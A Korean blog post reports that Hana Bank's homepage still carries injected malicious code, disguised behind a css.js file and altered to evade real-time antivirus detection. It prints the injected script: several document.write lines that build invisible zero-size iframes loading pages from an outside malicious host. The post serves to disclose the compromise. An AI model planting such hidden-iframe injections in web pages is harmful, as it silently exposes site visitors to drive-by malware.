Real Geeks

하나은행 홈페이지에 악성코드

시스템/IT/탐나는정보들
엇그제 하나은행 홈페이지에 악성코드가 심어져있다라는 글을 남긴적이 있다.

http://www.carstory.co.kr/468


아직도 그대로 방치되고 있고, 현재는 실시간에도 걸리지 않는다.

그리고 몇일 후 인데, 현재 그 악성코드 심어놓은것에 대한 패턴을 바꾸어서

N사의 실시간 탐지에도 걸리지 않고, 웹상에 그대로 방치가 되고 있다.

ocument.write("<iframe width=0 height=0 src=http://news.max3gp.com/news.htm></iframe>");
document.write("<iframe width=0 height=0 src=http://news.max3gp.com/rss.htm></iframe>");
document.write("<iframe width='0' height='0' src='http://news.max3gp.com/dd.htm'></iframe>");
~

하나은행 홈페이지에서 css.js 로 연결이 되어 눈속임으로 처리하였고
위 내용으로 되어져 있는걸 보면, 저 코드 삽입자가 주소를 바꾸고 코드를
수정한것을 알수가 있다.

참고로 news.htm의 코드

사용자 삽입 이미지



코드 내용은 몇일전 포스팅한 내용의 거의 유사하다

http://www.carstory.co.kr/468 참고하길